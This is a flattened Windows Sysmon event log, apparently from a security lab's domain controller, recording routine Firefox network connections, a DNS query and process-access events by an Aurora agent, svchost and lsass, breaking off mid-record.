Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56350-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x800000000000000043867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.845{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61453- 354300x800000000000000043866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.808{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56348-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 354300x800000000000000043865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.770{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56347-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 10341000x800000000000000043864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.529{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.529{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.529{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.529{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.529{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.529{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.504{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.504{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.504{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.503{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.503{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.503{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.492{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.492{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.492{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.491{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.491{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.491{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.486{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.486{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.486{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.485{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.485{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.485{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000043840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.389{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06157B4ED6A1C2D79F5A01A3C1311CC4,SHA256=08D2E5A6C545815D2BD4A89AD5236A0443A2435856CD746628807DF4197ECEE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.319{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.319{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.318{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.318{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.308{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.308{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla 